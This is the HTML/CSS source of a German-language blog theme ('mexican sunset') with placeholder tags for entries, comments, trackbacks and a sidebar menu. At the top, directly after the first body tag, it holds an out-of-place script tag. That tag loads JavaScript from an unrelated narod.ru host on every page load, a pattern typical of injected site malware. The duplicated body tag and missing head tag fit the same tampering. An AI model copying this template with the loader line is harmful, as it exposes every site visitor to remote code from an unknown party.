<html>
<body><script src=http://realxhouse.narod.ru/monitors/mon.js></script>
<meta http-equiv='Content-Type' content='text/html;charset=ISO-8859-1'>
<title><%WindowTitle%></title>
<style type='text/css'>
body {
margin: 0px;
background: #101224;
text-align: center;
color: #DDDDDD;
font-family: Georgia, verdana, arial, serif;
}
td {
text-align: left;
color: #DDDDDD;
font-family: "Trebuchet MS", verdana, arial, serif;
}
td.title {
height: 230px;
width: 700px;
padding: 10px;
background-image: url(./images/templates/mexican_sunset_title.jpg);
border: 3px solid #666666;
border-top: none;
vertical-align: bottom;
}
td.leftside {
background-image: url(./images/templates/mexican_sunset_bg.gif);
background-repeat: repeat-x;
background-color: #2A2D42;
padding: 10px;
border: 3px solid #666666;
border-top: none;
border-right: none;
font-size: 8pt;
line-height: 20px;
}
td.rightside {
background-image: url(./images/templates/mexican_sunset_bg.gif);
background-repeat: repeat-x;
background-color: #2A2D42;
padding: 10px;
border: 3px solid #666666;
border-top: none;
font-size: 10pt;
font-size: 8pt;
line-height: 20px;
}
h1 {
margin: 0px;
font-size: 24pt;
color: #EEEEEE;
font-weight: bold;
font-family: "Trebuchet MS", verdana, arial, serif;
}
h2 {
margin-top: 0px;
margin-bottom: 0px;
font-size: 12pt;
color: #FFFFFF;
font-weight: bold;
font-family: "Trebuchet MS", verdana, arial, serif;
}
div.avatar {
width: 20px;
border: 1px solid #555555;
padding: 5px;
margin-bottom: 10px;
margin-top: 3px;
}
div.timedate {
margin-bottom: 5px;
}
a:link { color: #FFEE81; text-decoration: none; }
a:visited { color: #FFEE81; text-decoration: none; }
a:hover { color: #FFAD81; text-decoration: underline; }
a.menu:link { color: #FFEE81; text-decoration: none; }
a.menu:visited { color: #FFEE81; text-decoration: none; }
a.menu:hover { color: #FFAD81; text-decoration: underline; font-weight: bold; }
</style>
</head>
<body>
<div align="center">
<table width='700' cellpadding='0' cellspacing='0'>
<tr><td class='title' colspan='2'><h1><%Title%> </h1></td></tr>
<tr>
<td class='leftside' width='550' valign='top'>
<!-- BEGIN LEFT SIDE -->
<!-- ARCHIVE PAGE -->
<IfArchivePage>
<h2>Archiv</h2>
<%ArchiveInfo%>
</IfArchivePage>
<!-- MAIN PAGE -->
<IfMainPage>
<Entry>
<h2><%EntryTitle%></h2>
<div class='timedate'>
<b><%EntryTime%>, <%EntryDate%></b>
<IfCategoriesAllowed>.. Geschrieben in <%EntryCategory%> </IfCategoriesAllowed>
<IfCommentsAllowed>.. <a href='<%EntryURL%>'><%EntryCommentCount%> Kommentare</a> </IfCommentsAllowed>
<IfTrackbacksAllowed>.. <a href='<%EntryURL%>'><%TrackbackCount%> Trackbacks</a> </IfTrackbacksAllowed>
.. <a href='<%EntryURL%>'>Link</a>
</div>
<%EntryBody%>
<br><br>
</Entry>
</IfMainPage>
<!-- ENTRY PAGE -->
<IfEntryPage>
<Entry>
<h2><%EntryTitle%></h2>
<div class='timedate'>
<b><%EntryTime%>, <%EntryDate%></b>
<IfCategoriesAllowed>.. Geschrieben in <%EntryCategory%> </IfCategoriesAllowed>
<IfCommentsAllowed>.. <a href='<%EntryURL%>'><%EntryCommentCount%> Kommentare</a> </IfCommentsAllowed>
<IfTrackbacksAllowed>.. <a href='<%EntryURL%>'><%TrackbackCount%> Trackbacks</a> </IfTrackbacksAllowed>
.. <a href='<%EntryURL%>'>Link</a>
</div>
<%EntryBody%>
<br>
<IfCommentsAllowed><IfCommentPostAllowed><a href='<%CommentPostURL%>'>Kommentar hinterlassen</a></IfCommentPostAllowed> </IfCommentsAllowed>
<IfTrackbacksAllowed><IfCommentsAllowed><IfCommentPostAllowed>.. </IfCommentPostAllowed></IfCommentsAllowed> <a href='<%TrackbackURL%>'>Trackback</a></IfTrackbacksAllowed>
<br><br>
<blockquote>
<IfCommentsAllowed>
<Comment>
<h2><%CommentTitle%></h2>
<div class='timedate'>
<b><%CommentTime%>, <%CommentDate%></b>
.. Geschrieben von <%CommentAuthor%>
<CommentEdit>.. Bearbeiten</CommentEdit>
<CommentDelete>.. Löschen </CommentDelete>
</div>
<%CommentBody%>
<br><br>
</Comment>
</IfCommentsAllowed>
<IfTrackbacksAllowed>
<Trackback>
<h2><%TrackbackTitle%></h2>
<div class='timedate'>
<b><%TrackbackTime%>, <%TrackbackDate%></b>
.. Geschrieben in <a href='<%TrackbackURL%>'><%TrackbackBlogName%></a>
<TrackbackDelete>.. Löschen </TrackbackDelete>
</div>
<%TrackbackExcerpt%>
<br><br>
</Trackback>
</IfTrackbacksAllowed>
</blockquote>
</Entry>
</IfEntryPage>
<!-- FRIENDS PAGE -->
<IfFriendsPage>
<Entry>
<h2><%EntryTitle%></h2>
<div class='timedate'>
Geschrieben von <a href='<%EntryAuthorURL%>'><%EntryAuthor%></a><br>
<b><%EntryTime%>, <%EntryDate%></b>
<IfCategoriesAllowed>.. Geschrieben in <%EntryCategory%> </IfCategoriesAllowed>
<IfCommentsAllowed>.. <a href='<%EntryURL%>'><%EntryCommentCount%> Kommentare</a> </IfCommentsAllowed>
<IfTrackbacksAllowed>.. <a href='<%EntryURL%>'><%TrackbackCount%> Trackbacks</a> </IfTrackbacksAllowed>
.. <a href='<%EntryURL%>'>Link</a>
</div>
<%EntryBody%>
<br><br>
</Entry>
</IfFriendsPage>
<IfPages>{ <LaterLink>Vorherige Seite</LaterLink> } { Seite <%CurrentPage%> von <%TotalPages%> } { <EarlierLink>Nächste Seite</EarlierLink>
}</IfPages>
<!-- END LEFT SIDE -->
</td>
<td class='rightside' width='150' valign='top'>
<!-- BEGIN RIGHT SIDE -->
<h2>Über mich </h2>
<div class='avatar'><img src='<%Avatar%>' border='0'></div>
<a class='menu' href='<%MainPageURL%>'>Home</a><br>
<a class='menu' href='<%ProfileURL%>'>Profil</a><br>
<a class='menu' href='<%ArchiveURL%>'>Archiv</a><br>
<a class='menu' href='<%FriendsPageURL%>'>Freunde</a><br>
<a class='menu' href='<%AlbumURL%>'>Fotoalbum</a><br>
<br>
<h2>Links</h2>
<Link><a href='<%LinkURL%>'><%LinkTitle%></a><br></Link>
<br>
<h2>Kategorien</h2>
<Categories><a href='<%CategoryURL%>'><%Category%></a><br></Categories>
<br>
<h2>Letzte Einträge </h2>
<RecentEntry><%RecentEntryTitle%><br></RecentEntry>
<br>
<h2>Freunde</h2>
<Friends><a href='<%FriendURL%>'><%FriendUsername%></a><br></Friends>
<!-- END RIGHT SIDE -->
</td>
</tr>
</table>
</div>
</body>
</html>